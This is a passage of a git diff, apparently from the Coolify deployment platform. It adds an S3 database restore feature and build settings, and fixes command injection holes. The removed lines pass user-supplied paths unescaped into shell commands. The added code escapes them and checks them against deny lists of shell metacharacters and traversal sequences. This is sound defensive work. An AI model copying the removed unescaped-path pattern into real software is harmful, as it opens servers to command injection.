syncData(bool $toModel = false) $this->serverReachableWebhookNotifications = $this->settings->server_reachable_webhook_notifications; $this->serverUnreachableWebhookNotifications = $this->settings->server_unreachable_webhook_notifications; $this->serverPatchWebhookNotifications = $this->settings->server_patch_webhook_notifications; + $this->traefikOutdatedWebhookNotifications = $this->settings->traefik_outdated_webhook_notifications; } } diff --git a/app/Livewire/Project/Application/Advanced.php b/app/Livewire/Project/Application/Advanced.php index ed15ab258..cf7ef3e0b 100644 --- a/app/Livewire/Project/Application/Advanced.php +++ b/app/Livewire/Project/Application/Advanced.php @@ -37,6 +37,12 @@ class Advanced extends Component #[Validate(['boolean'])] public bool $disableBuildCache = false; + #[Validate(['boolean'])] + public bool $injectBuildArgsToDockerfile = true; + + #[Validate(['boolean'])] + public bool $includeSourceCommitInBuild = false; + #[Validate(['boolean'])] public bool $isLogDrainEnabled = false; @@ -110,6 +116,8 @@ public function syncData(bool $toModel = false) $this->application->settings->is_raw_compose_deployment_enabled = $this->isRawComposeDeploymentEnabled; $this->application->settings->connect_to_docker_network = $this->isConnectToDockerNetworkEnabled; $this->application->settings->disable_build_cache = $this->disableBuildCache; + $this->application->settings->inject_build_args_to_dockerfile = $this->injectBuildArgsToDockerfile; + $this->application->settings->include_source_commit_in_build = $this->includeSourceCommitInBuild; $this->application->settings->save(); } else { $this->isForceHttpsEnabled = $this->application->isForceHttpsEnabled(); @@ -134,6 +142,8 @@ public function syncData(bool $toModel = false) $this->isRawComposeDeploymentEnabled = $this->application->settings->is_raw_compose_deployment_enabled; $this->isConnectToDockerNetworkEnabled = $this->application->settings->connect_to_docker_network; $this->disableBuildCache = $this->application->settings->disable_build_cache; + $this->injectBuildArgsToDockerfile = $this->application->settings->inject_build_args_to_dockerfile ?? true; + $this->includeSourceCommitInBuild = $this->application->settings->include_source_commit_in_build ?? false; } } diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php index a83e6f70a..71ca9720e 100644 --- a/app/Livewire/Project/Application/General.php +++ b/app/Livewire/Project/Application/General.php @@ -641,8 +641,6 @@ public function updatedBuildPack() $this->application->settings->is_static = false; $this->application->settings->save(); } else { - $this->portsExposes = '3000'; - $this->application->ports_exposes = '3000'; $this->resetDefaultLabels(false); } if ($this->buildPack === 'dockercompose') { @@ -655,18 +653,6 @@ public function updatedBuildPack() } catch (\Illuminate\Auth\Access\AuthorizationException $e) { // User doesn't have update permission, just continue without saving } - } else { - // Clear Docker Compose specific data when switching away from dockercompose - if ($this->application->getOriginal('build_pack') === 'dockercompose') { - $this->application->docker_compose_domains = null; - $this->application->docker_compose_raw = null; - - // Remove SERVICE_FQDN_* and SERVICE_URL_* environment variables - $this->application->environment_variables()->where('key', 'LIKE', 'SERVICE_FQDN_%')->delete(); - $this->application->environment_variables()->where('key', 'LIKE', 'SERVICE_URL_%')->delete(); - $this->application->environment_variables_preview()->where('key', 'LIKE', 'SERVICE_FQDN_%')->delete(); - $this->application->environment_variables_preview()->where('key', 'LIKE', 'SERVICE_URL_%')->delete(); - } } if ($this->buildPack === 'static') { $this->portsExposes = '80'; @@ -1000,4 +986,60 @@ private function updateServiceEnvironmentVariables() } } } + + public function getDetectedPortInfoProperty(): ?array + { + $detectedPort = $this->application->detectPortFromEnvironment(); + + if (! $detectedPort) { + return null; + } + + $portsExposesArray = $this->application->ports_exposes_array; + $isMatch = in_array($detectedPort, $portsExposesArray); + $isEmpty = empty($portsExposesArray); + + return [ + 'port' => $detectedPort, + 'matches' => $isMatch, + 'isEmpty' => $isEmpty, + ]; + } + + public function getDockerComposeBuildCommandPreviewProperty(): string + { + if (! $this->dockerComposeCustomBuildCommand) { + return ''; + } + + // Normalize baseDirectory to prevent double slashes (e.g., when baseDirectory is '/') + $normalizedBase = $this->baseDirectory === '/' ? '' : rtrim($this->baseDirectory, '/'); + + // Use relative path for clarity in preview (e.g., ./backend/docker-compose.yaml) + // Actual deployment uses absolute path: /artifacts/{deployment_uuid}{base_directory}{docker_compose_location} + // Build-time env path references ApplicationDeploymentJob::BUILD_TIME_ENV_PATH as source of truth + return injectDockerComposeFlags( + $this->dockerComposeCustomBuildCommand, + ".{$normalizedBase}{$this->dockerComposeLocation}", + \App\Jobs\ApplicationDeploymentJob::BUILD_TIME_ENV_PATH + ); + } + + public function getDockerComposeStartCommandPreviewProperty(): string + { + if (! $this->dockerComposeCustomStartCommand) { + return ''; + } + + // Normalize baseDirectory to prevent double slashes (e.g., when baseDirectory is '/') + $normalizedBase = $this->baseDirectory === '/' ? '' : rtrim($this->baseDirectory, '/'); + + // Use relative path for clarity in preview (e.g., ./backend/docker-compose.yaml) + // Placeholder {workdir}/.env shows it's the workdir .env file (runtime env, not build-time) + return injectDockerComposeFlags( + $this->dockerComposeCustomStartCommand, + ".{$normalizedBase}{$this->dockerComposeLocation}", + '{workdir}/.env' + ); + } } diff --git a/app/Livewire/Project/Application/Heading.php b/app/Livewire/Project/Application/Heading.php index 5231438e5..fc63c7f4b 100644 --- a/app/Livewire/Project/Application/Heading.php +++ b/app/Livewire/Project/Application/Heading.php @@ -101,11 +101,18 @@ public function deploy(bool $force_rebuild = false) force_rebuild: $force_rebuild, ); if ($result['status'] === 'skipped') { - $this->dispatch('success', 'Deployment skipped', $result['message']); + $this->dispatch('error', 'Deployment skipped', $result['message']); return; } + // Reset restart count on successful deployment + $this->application->update([ + 'restart_count' => 0, + 'last_restart_at' => null, + 'last_restart_type' => null, + ]); + return $this->redirectRoute('project.application.deployment.show', [ 'project_uuid' => $this->parameters['project_uuid'], 'application_uuid' => $this->parameters['application_uuid'], @@ -137,6 +144,7 @@ public function restart() return; } + $this->setDeploymentUuid(); $result = queue_application_deployment( application: $this->application, @@ -149,6 +157,13 @@ public function restart() return; } + // Reset restart count on manual restart + $this->application->update([ + 'restart_count' => 0, + 'last_restart_at' => now(), + 'last_restart_type' => 'manual', + ]); + return $this->redirectRoute('project.application.deployment.show', [ 'project_uuid' => $this->parameters['project_uuid'], 'application_uuid' => $this->parameters['application_uuid'], diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php index 7deaa82a9..18ad93016 100644 --- a/app/Livewire/Project/Database/BackupEdit.php +++ b/app/Livewire/Project/Database/BackupEdit.php @@ -79,7 +79,7 @@ class BackupEdit extends Component #[Validate(['required', 'boolean'])] public bool $dumpAll = false; - #[Validate(['required', 'int', 'min:1', 'max:36000'])] + #[Validate(['required', 'int', 'min:60', 'max:36000'])] public int $timeout = 3600; public function mount() @@ -107,6 +107,25 @@ public function syncData(bool $toModel = false) $this->backup->save_s3 = $this->saveS3; $this->backup->disable_local_backup = $this->disableLocalBackup; $this->backup->s3_storage_id = $this->s3StorageId; + + // Validate databases_to_backup to prevent command injection + if (filled($this->databasesToBackup)) { + $databases = str($this->databasesToBackup)->explode(','); + foreach ($databases as $index => $db) { + $dbName = trim($db); + try { + validateShellSafePath($dbName, 'database name'); + } catch (\Exception $e) { + // Provide specific error message indicating which database failed validation + $position = $index + 1; + throw new \Exception( + "Database #{$position} ('{$dbName}') validation failed: ". + $e->getMessage() + ); + } + } + } + $this->backup->databases_to_backup = $this->databasesToBackup; $this->backup->dump_all = $this->dumpAll; $this->backup->timeout = $this->timeout; diff --git a/app/Livewire/Project/Database/Import.php b/app/Livewire/Project/Database/Import.php index 7d6ac3131..26feb1a5e 100644 --- a/app/Livewire/Project/Database/Import.php +++ b/app/Livewire/Project/Database/Import.php @@ -2,6 +2,7 @@ namespace App\Livewire\Project\Database; +use App\Models\S3Storage; use App\Models\Server; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; use Illuminate\Support\Facades\Auth; @@ -12,6 +13,92 @@ class Import extends Component { use AuthorizesRequests; + /** + * Validate that a string is safe for use as an S3 bucket name. + * Allows alphanumerics, dots, dashes, and underscores. + */ + private function validateBucketName(string $bucket): bool + { + return preg_match('/^[a-zA-Z0-9.\-_]+$/', $bucket) === 1; + } + + /** + * Validate that a string is safe for use as an S3 path. + * Allows alphanumerics, dots, dashes, underscores, slashes, and common file characters. + */ + private function validateS3Path(string $path): bool + { + // Must not be empty + if (empty($path)) { + return false; + } + + // Must not contain dangerous shell metacharacters or command injection patterns + $dangerousPatterns = [ + '..', // Directory traversal + '$(', // Command substitution + '`', // Backtick command substitution + '|', // Pipe + ';', // Command separator + '&', // Background/AND + '>', // Redirect + '<', // Redirect + "\n", // Newline + "\r", // Carriage return + "\0", // Null byte + "'", // Single quote + '"', // Double quote + '\\', // Backslash + ]; + + foreach ($dangerousPatterns as $pattern) { + if (str_contains($path, $pattern)) { + return false; + } + } + + // Allow alphanumerics, dots, dashes, underscores, slashes, spaces, plus, equals, at + return preg_match('/^[a-zA-Z0-9.\-_\/\s+@=]+$/', $path) === 1; + } + + /** + * Validate that a string is safe for use as a file path on the server. + */ + private function validateServerPath(string $path): bool + { + // Must be an absolute path + if (! str_starts_with($path, '/')) { + return false; + } + + // Must not contain dangerous shell metacharacters or command injection patterns + $dangerousPatterns = [ + '..', // Directory traversal + '$(', // Command substitution + '`', // Backtick command substitution + '|', // Pipe + ';', // Command separator + '&', // Background/AND + '>', // Redirect + '<', // Redirect + "\n", // Newline + "\r", // Carriage return + "\0", // Null byte + "'", // Single quote + '"', // Double quote + '\\', // Backslash + ]; + + foreach ($dangerousPatterns as $pattern) { + if (str_contains($path, $pattern)) { + return false; + } + } + + // Allow alphanumerics, dots, dashes, underscores, slashes, and spaces + return preg_match('/^[a-zA-Z0-9.\-_\/\s]+$/', $path) === 1; + } + public bool $unsupported = false; public $resource; @@ -46,6 +133,8 @@ class Import extends Component public string $customLocation = ''; + public ?int $activityId = null; + public string $postgresqlRestoreCommand = 'pg_restore -U $POSTGRES_USER -d $POSTGRES_DB'; public string $mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE'; @@ -54,22 +143,35 @@ class Import extends Component public string $mongodbRestoreCommand = 'mongorestore --authenticationDatabase=admin --username $MONGO_INITDB_ROOT_USERNAME --password $MONGO_INITDB_ROOT_PASSWORD --uri mongodb://localhost:27017 --gzip --archive='; + // S3 Restore properties + public $availableS3Storages = []; + + public ?int $s3StorageId = null; + + public string $s3Path = ''; + + public ?int $s3FileSize = null; + public function getListeners() { $userId = Auth::id(); return [ "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh', + 'slideOverClosed' => 'resetActivityId', ]; } + public function resetActivityId() + { + $this->activityId = null; + } + public function mount() { - if (isDev()) { - $this->customLocation = '/data/coolify/pg-dump-all-1736245863.gz'; - } $this->parameters = get_route_parameters(); $this->getContainers(); + $this->loadAvailableS3Storages(); } public function updatedDumpAll($value) @@ -152,8 +254,16 @@ public function getContainers() public function checkFile() { if (filled($this->customLocation)) { + // Validate the custom location to prevent command injection + if (! $this->validateServerPath($this->customLocation)) { + $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).'); + + return; + } + try { - $result = instant_remote_process(["ls -l {$this->customLocation}"], $this->server, throwError: false); + $escapedPath = escapeshellarg($this->customLocation); + $result = instant_remote_process(["ls -l {$escapedPath}"], $this->server, throwError: false); if (blank($result)) { $this->dispatch('error', 'The file does not exist or has been deleted.'); @@ -179,59 +289,35 @@ public function runImport() try { $this->importRunning = true; $this->importCommands = []; - if (filled($this->customLocation)) { - $backupFileName = '/tmp/restore_'.$this->resource->uuid; - $this->importCommands[] = "docker cp {$this->customLocation} {$this->container}:{$backupFileName}"; - $tmpPath = $backupFileName; - } else { - $backupFileName = "upload/{$this->resource->uuid}/restore"; - $path = Storage::path($backupFileName); - if (! Storage::exists($backupFileName)) { - $this->dispatch('error', 'The file does not exist or has been deleted.'); + $backupFileName = "upload/{$this->resource->uuid}/restore"; - return; - } + // Check if an uploaded file exists first (takes priority over custom location) + if (Storage::exists($backupFileName)) { + $path = Storage::path($backupFileName); $tmpPath = '/tmp/'.basename($backupFileName).'_'.$this->resource->uuid; instant_scp($path, $tmpPath, $this->server); Storage::delete($backupFileName); $this->importCommands[] = "docker cp {$tmpPath} {$this->container}:{$tmpPath}"; + } elseif (filled($this->customLocation)) { + // Validate the custom location to prevent command injection + if (! $this->validateServerPath($this->customLocation)) { + $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters.'); + + return; + } + $tmpPath = '/tmp/restore_'.$this->resource->uuid; + $escapedCustomLocation = escapeshellarg($this->customLocation); + $this->importCommands[] = "docker cp {$escapedCustomLocation} {$this->container}:{$tmpPath}"; + } else { + $this->dispatch('error', 'The file does not exist or has been deleted.'); + + return; } // Copy the restore command to a script file $scriptPath = "/tmp/restore_{$this->resource->uuid}.sh"; - switch ($this->resource->getMorphClass()) { - case \App\Models\StandaloneMariadb::class: - $restoreCommand = $this->mariadbRestoreCommand; - if ($this->dumpAll) { - $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD"; - } else { - $restoreCommand .= " < {$tmpPath}"; - } - break; - case \App\Models\StandaloneMysql::class: - $restoreCommand = $this->mysqlRestoreCommand; - if ($this->dumpAll) { - $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD"; - } else { - $restoreCommand .= " < {$tmpPath}"; - } - break; - case \App\Models\StandalonePostgresql::class: - $restoreCommand = $this->postgresqlRestoreCommand; - if ($this->dumpAll) { - $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | psql -U \$POSTGRES_USER postgres"; - } else { - $restoreCommand .= " {$tmpPath}"; - } - break; - case \App\Models\StandaloneMongodb::class: - $restoreCommand = $this->mongodbRestoreCommand; - if ($this->dumpAll === false) { - $restoreCommand .= "{$tmpPath}"; - } - break; - } + $restoreCommand = $this->buildRestoreCommand($tmpPath); $restoreCommandBase64 = base64_encode($restoreCommand); $this->importCommands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}"; @@ -248,7 +334,13 @@ public function runImport() 'container' => $this->container, 'serverId' => $this->server->id, ]); + + // Track the activity ID + $this->activityId = $activity->id; + + // Dispatch activity to the monitor and open slide-over $this->dispatch('activityMonitor', $activity->id); + $this->dispatch('databaserestore'); } } catch (\Throwable $e) { return handleError($e, $this); @@ -257,4 +349,267 @@ public function runImport() $this->importCommands = []; } } + + public function loadAvailableS3Storages() + { + try { + $this->availableS3Storages = S3Storage::ownedByCurrentTeam(['id', 'name', 'description']) + ->where('is_usable', true) + ->get(); + } catch (\Throwable $e) { + $this->availableS3Storages = collect(); + } + } + + public function updatedS3Path($value) + { + // Reset validation state when path changes + $this->s3FileSize = null; + + // Ensure path starts with a slash + if ($value !== null && $value !== '') { + $this->s3Path = str($value)->trim()->start('/')->value(); + } + } + + public function updatedS3StorageId() + { + // Reset validation state when storage changes + $this->s3FileSize = null; + } + + public function checkS3File() + { + if (! $this->s3StorageId) { + $this->dispatch('error', 'Please select an S3 storage.'); + + return; + } + + if (blank($this->s3Path)) { + $this->dispatch('error', 'Please provide an S3 path.'); + + return; + } + + // Clean the path (remove leading slash if present) + $cleanPath = ltrim($this->s3Path, '/'); + + // Validate the S3 path early to prevent command injection in subsequent operations + if (! $this->validateS3Path($cleanPath)) { + $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).'); + + return; + } + + try { + $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId); + + // Validate bucket name early + if (! $this->validateBucketName($s3Storage->bucket)) { + $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.'); + + return; + } + + // Test connection + $s3Storage->testConnection(); + + // Build S3 disk configuration + $disk = Storage::build([ + 'driver' => 's3', + 'region' => $s3Storage->region, + 'key' => $s3Storage->key, + 'secret' => $s3Storage->secret, + 'bucket' => $s3Storage->bucket, + 'endpoint' => $s3Storage->endpoint, + 'use_path_style_endpoint' => true, + ]); + + // Check if file exists + if (! $disk->exists($cleanPath)) { + $this->dispatch('error', 'File not found in S3. Please check the path.'); + + return; + } + + // Get file size + $this->s3FileSize = $disk->size($cleanPath); + + $this->dispatch('success', 'File found in S3. Size: '.formatBytes($this->s3FileSize)); + } catch (\Throwable $e) { + $this->s3FileSize = null; + + return handleError($e, $this); + } + } + + public function restoreFromS3() + { + $this->authorize('update', $this->resource); + + if (! $this->s3StorageId || blank($this->s3Path)) { + $this->dispatch('error', 'Please select S3 storage and provide a path first.'); + + return; + } + + if (is_null($this->s3FileSize)) { + $this->dispatch('error', 'Please check the file first by clicking "Check File".'); + + return; + } + + try { + $this->importRunning = true; + + $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId); + + $key = $s3Storage->key; + $secret = $s3Storage->secret; + $bucket = $s3Storage->bucket; + $endpoint = $s3Storage->endpoint; + + // Validate bucket name to prevent command injection + if (! $this->validateBucketName($bucket)) { + $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.'); + + return; + } + + // Clean the S3 path + $cleanPath = ltrim($this->s3Path, '/'); + + // Validate the S3 path to prevent command injection + if (! $this->validateS3Path($cleanPath)) { + $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).'); + + return; + } + + // Get helper image + $helperImage = config('constants.coolify.helper_image'); + $latestVersion = getHelperVersion(); + $fullImageName = "{$helperImage}:{$latestVersion}"; + + // Get the database destination network + $destinationNetwork = $this->resource->destination->network ?? 'coolify'; + + // Generate unique names for this operation + $containerName = "s3-restore-{$this->resource->uuid}"; + $helperTmpPath = '/tmp/'.basename($cleanPath); + $serverTmpPath = "/tmp/s3-restore-{$this->resource->uuid}-".basename($cleanPath); + $containerTmpPath = "/tmp/restore_{$this->resource->uuid}-".basename($cleanPath); + $scriptPath = "/tmp/restore_{$this->resource->uuid}.sh"; + + // Prepare all commands in sequence + $commands = []; + + // 1. Clean up any existing helper container and temp files from previous runs + $commands[] = "docker rm -f {$containerName} 2>/dev/null || true"; + $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true"; + $commands[] = "docker exec {$this->container} rm -f {$containerTmpPath} {$scriptPath} 2>/dev/null || true"; + + // 2. Start helper container on the database network + $commands[] = "docker run -d --network {$destinationNetwork} --name {$containerName} {$fullImageName} sleep 3600"; + + // 3. Configure S3 access in helper container + $escapedEndpoint = escapeshellarg($endpoint); + $escapedKey = escapeshellarg($key); + $escapedSecret = escapeshellarg($secret); + $commands[] = "docker exec {$containerName} mc alias set s3temp {$escapedEndpoint} {$escapedKey} {$escapedSecret}"; + + // 4. Check file exists in S3 (bucket and path already validated above) + $escapedBucket = escapeshellarg($bucket); + $escapedCleanPath = escapeshellarg($cleanPath); + $escapedS3Source = escapeshellarg("s3temp/{$bucket}/{$cleanPath}"); + $commands[] = "docker exec {$containerName} mc stat {$escapedS3Source}"; + + // 5. Download from S3 to helper container (progress shown by default) + $escapedHelperTmpPath = escapeshellarg($helperTmpPath); + $commands[] = "docker exec {$containerName} mc cp {$escapedS3Source} {$escapedHelperTmpPath}"; + + // 6. Copy from helper to server, then immediately to database container + $commands[] = "docker cp {$containerName}:{$helperTmpPath} {$serverTmpPath}"; + $commands[] = "docker cp {$serverTmpPath} {$this->container}:{$containerTmpPath}"; + + // 7. Cleanup helper container and server temp file immediately (no longer needed) + $commands[] = "docker rm -f {$containerName} 2>/dev/null || true"; + $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true"; + + // 8. Build and execute restore command inside database container + $restoreCommand = $this->buildRestoreCommand($containerTmpPath); + + $restoreCommandBase64 = base64_encode($restoreCommand); + $commands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}"; + $commands[] = "chmod +x {$scriptPath}"; + $commands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}"; + + // 9. Execute restore and cleanup temp files immediately after completion + $commands[] = "docker exec {$this->container} sh -c '{$scriptPath} && rm -f {$containerTmpPath} {$scriptPath}'"; + $commands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'"; + + // Execute all commands with cleanup event (as safety net for edge cases) + $activity = remote_process($commands, $this->server, ignore_errors: true, callEventOnFinish: 'S3RestoreJobFinished', callEventData: [ + 'containerName' => $containerName, + 'serverTmpPath' => $serverTmpPath, + 'scriptPath' => $scriptPath, + 'containerTmpPath' => $containerTmpPath, + 'container' => $this->container, + 'serverId' => $this->server->id, + ]); + + // Track the activity ID + $this->activityId = $activity->id; + + // Dispatch activity to the monitor and open slide-over + $this->dispatch('activityMonitor', $activity->id); + $this->dispatch('databaserestore'); + $this->dispatch('info', 'Restoring database from S3. Progress will be shown in the activity monitor...'); + } catch (\Throwable $e) { + $this->importRunning = false; + + return handleError($e, $this); + } + } + + public function buildRestoreCommand(string $tmpPath): string + { + switch ($this->resource->getMorphClass()) { + case \App\Models\StandaloneMariadb::class: + $restoreCommand = $this->mariadbRestoreCommand; + if ($this->dumpAll) { + $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD"; + } else { + $restoreCommand .= " < {$tmpPath}"; + } + break; + case \App\Models\StandaloneMysql::class: + $restoreCommand = $this->mysqlRestoreCommand; + if ($this->dumpAll) { + $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD"; + } else { + $restoreCommand .= " < {$tmpPath}"; + } + break; + case \App\Models\StandalonePostgresql::class: + $restoreCommand = $this->postgresqlRestoreCommand; + if ($this->dumpAll) { + $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | psql -U \$POSTGRES_USER postgres"; + } else { + $restoreCommand .= " {$tmpPath}"; + } + break; + case \App\Models\StandaloneMongodb::class: + $restoreCommand = $this->mongodbRestoreCommand; + if ($this->dumpAll === false) { + $restoreCommand .= "{$tmpPath}"; + } + break; + default: + $restoreCommand = ''; + } + + return $restoreCommand; + } } diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php index 3240aadd2..7ef2cdc4f 100644 --- a/app/Livewire/Project/Database/Postgresql/General.php +++ b/app/Livewire/Project/Database/Postgresql/General.php @@ -328,12 +328,15 @@ public function save_init_script($script) $configuration_dir = database_configuration_dir().'/'.$container_name; if ($oldScript && $oldScript['filename'] !== $script['filename']) { - $old_file_path = "$configuration_dir/docker-entrypoint-initdb.d/{$oldScript['filename']}"; - $delete_command = "rm -f $old_file_path"; try { + // Validate and escape filename to prevent command injection + validateShellSafePath($oldScript['filename'], 'init script filename'); + $old_file_path = "$configuration_dir/docker-entrypoint-initdb.d/{$oldScript['filename']}"; + $escapedOldPath = escapeshellarg($old_file_path); + $delete_command = "rm -f {$escapedOldPath}"; instant_remote_process([$delete_command], $this->server); } catch (Exception $e) { - $this->dispatch('error', 'Failed to remove old init script from server: '.$e->getMessage()); + $this->dispatch('error', $e->getMessage()); return; } @@ -370,13 +373,17 @@ public function delete_init_script($script) if ($found) { $container_name = $this->database->uuid; $configuration_dir = database_configuration_dir().'/'.$container_name; - $file_path = "$configuration_dir/docker-entrypoint-initdb.d/{$script['filename']}"; - $command = "rm -f $file_path"; try { + // Validate and escape filename to prevent command injection + validateShellSafePath($script['filename'], 'init script filename'); + $file_path = "$configuration_dir/docker-entrypoint-initdb.d/{$script['filename']}"; + $escapedPath = escapeshellarg($file_path); + + $command = "rm -f {$escapedPath}"; instant_remote_process([$command], $this->server); } catch (Exception $e) { - $this->dispatch('error', 'Failed to remove init script from server: '.$e->getMessage()); + $this->dispatch('error', $e->getMessage()); return; } @@ -405,6 +412,16 @@ public function save_new_init_script() 'new_filename' => 'required|string', 'new_content' => 'required|string', ]); + + try { + // Validate filename to prevent command injection + validateShellSafePath($this->new_filename, 'init script filename'); + } catch (Exception $e) { + $this->dispatch('error', $e->getMessage()); + + return; + } + $found = collect($this->initScripts)->firstWhere('filename', $this->new_filename); if ($found) { $this->dispatch('error', 'Filename already exists.'); diff --git a/app/Livewire/Project/Resource/Create.php b/app/Livewire/Project/Resource/Create.php index cdf95d2e4..1550fd632 100644 --- a/app/Livewire/Project/Resource/Create.php +++ b/app/Livewire/Project/Resource/Create.php @@ -81,7 +81,7 @@ public function mount() 'destination_id' => $destination->id, 'destination_type' => $destination->getMorphClass(), ]; - if ($oneClickServiceName === 'cloudflared' || $oneClickServiceName === 'pgadmin') { + if ($oneClickServiceName === 'pgadmin' || $oneClickServiceName === 'postgresus') { data_set($service_payload, 'connect_to_docker_network', true); } $service = Service::create($service_payload); diff --git a/app/Livewire/Project/Service/EditDomain.php b/app/Livewire/Project/Service/EditDomain.php index a9a7de878..7158b6e40 100644 --- a/app/Livewire/Project/Service/EditDomain.php +++ b/app/Livewire/Project/Service/EditDomain.php @@ -39,7 +39,7 @@ public function mount() { $this->application = ServiceApplication::ownedByCurrentTeam()->findOrFail($this->applicationId); $this->authorize('view', $this->application); - $this->requiredPort = $this->application->service->getRequiredPort(); + $this->requiredPort = $this->application->getRequiredPort(); $this->syncData(); } @@ -113,8 +113,7 @@ public function submit() // Check for required port if (! $this->forceRemovePort) { - $service = $this->application->service; - $requiredPort = $service->getRequiredPort(); + $requiredPort = $this->application->getRequiredPort(); if ($requiredPort !== null) { // Check if all FQDNs have a port diff --git a/app/Livewire/Project/Service/ServiceApplicationView.php b/app/Livewire/Project/Service/ServiceApplicationView.php index 1d8d8b247..259b9dbec 100644 --- a/app/Livewire/Project/Service/ServiceApplicationView.php +++ b/app/Livewire/Project/Service/ServiceApplicationView.php @@ -135,7 +135,7 @@ public function mount() try { $this->parameters = get_route_parameters(); $this->authorize('view', $this->application); - $this->requiredPort = $this->application->service->getRequiredPort(); + $this->requiredPort = $this->application->getRequiredPort(); $this->syncData(); } catch (\Throwable $e) { return handleError($e, $this); @@ -268,8 +268,7 @@ public function submit() // Check for required port if (! $this->forceRemovePort) { - $service = $this->application->service; - $requiredPort = $service->getRequiredPort(); + $requiredPort = $this->application->getRequiredPort(); if ($requiredPort !== null) { // Check if all FQDNs have a port diff --git a/app/Livewire/Project/Service/StackForm.php b/app/Livewire/Project/Service/StackForm.php index 85cd21a7f..72ae6915a 100644 --- a/app/Livewire/Project/Service/StackForm.php +++ b/app/Livewire/Project/Service/StackForm.php @@ -5,6 +5,7 @@ use App\Models\Service; use App\Support\ValidationPatterns; use Illuminate\Support\Collection; +use Illuminate\Support\Facades\DB; use Livewire\Component; class StackForm extends Component @@ -22,7 +23,7 @@ class StackForm extends Component public string $dockerComposeRaw; - public string $dockerCompose; + public ?string $dockerCompose = null; public ?bool $connectToDockerNetwork = null; @@ -30,7 +31,7 @@ protected function rules(): array { $baseRules = [ 'dockerComposeRaw' => 'required', - 'dockerCompose' => 'required', + 'dockerCompose' => 'nullable', 'name' => ValidationPatterns::nameRules(), 'description' => ValidationPatterns::descriptionRules(), 'connectToDockerNetwork' => 'nullable', @@ -140,18 +141,27 @@ public function submit($notify = true) $this->validate(); $this->syncData(true); - // Validate for command injection BEFORE saving to database + // Validate for command injection BEFORE any database operations validateDockerComposeForInjection($this->service->docker_compose_raw); - $this->service->save(); - $this->service->saveExtraFields($this->fields); - $this->service->parse(); + // Use transaction to ensure atomicity - if parse fails, save is rolled back + DB::transaction(function () { + $this->service->save(); + $this->service->saveExtraFields($this->fields); + $this->service->parse(); + }); + // Refresh and write files after a successful commit $this->service->refresh(); $this->service->saveComposeConfigs(); + $this->dispatch('refreshEnvs'); $this->dispatch('refreshServices'); $notify && $this->dispatch('success', 'Service saved.'); } catch (\Throwable $e) { + // On error, refresh from database to restore clean state + $this->service->refresh(); + $this->syncData(false); + return handleError($e, $this); } finally { if (is_null($this->service->config_hash)) { diff --git a/app/Livewire/Project/Service/Storage.php b/app/Livewire/Project/Service/Storage.php index db171db24..644b100b8 100644 --- a/app/Livewire/Project/Service/Storage.php +++ b/app/Livewire/Project/Service/Storage.php @@ -179,6 +179,10 @@ public function submitFileStorageDirectory() $this->file_storage_directory_destination = trim($this->file_storage_directory_destination); $this->file_storage_directory_destination = str($this->file_storage_directory_destination)->start('/')->value(); + // Validate paths to prevent command injection + validateShellSafePath($this->file_storage_directory_source, 'storage source path'); + validateShellSafePath($this->file_storage_directory_destination, 'storage destination path'); + \App\Models\LocalFileVolume::create([ 'fs_path' => $this->file_storage_directory_source, 'mount_path' => $this->file_storage_directory_destination, diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php index 5f5e12e0a..fa65e8bd2 100644 --- a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php +++ b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php @@ -2,8 +2,11 @@ namespace App\Livewire\Project\Shared\EnvironmentVariable; +use App\Models\Environment; +use App\Models\Project; use App\Traits\EnvironmentVariableAnalyzer; use Illuminate\Foundation\Auth\Access\AuthorizesRequests; +use Livewire\Attributes\Computed; use Livewire\Component; class Add extends Component @@ -56,6 +59,72 @@ public function mount() $this->problematicVariables = self::getProblematicVariablesForFrontend(); } + #[Computed] + public function availableSharedVariables(): array + { + $team = currentTeam(); + $result = [ + 'team' => [], + 'project' => [], + 'environment' => [], + ]; + + // Early return if no team + if (! $team) { + return $result; + } + + // Check if user can view team variables + try { + $this->authorize('view', $team); + $result['team'] = $team->environment_variables() + ->pluck('key') + ->toArray(); + } catch (\Illuminate\Auth\Access\AuthorizationException $e) { + // User not authorized to view team variables + } + 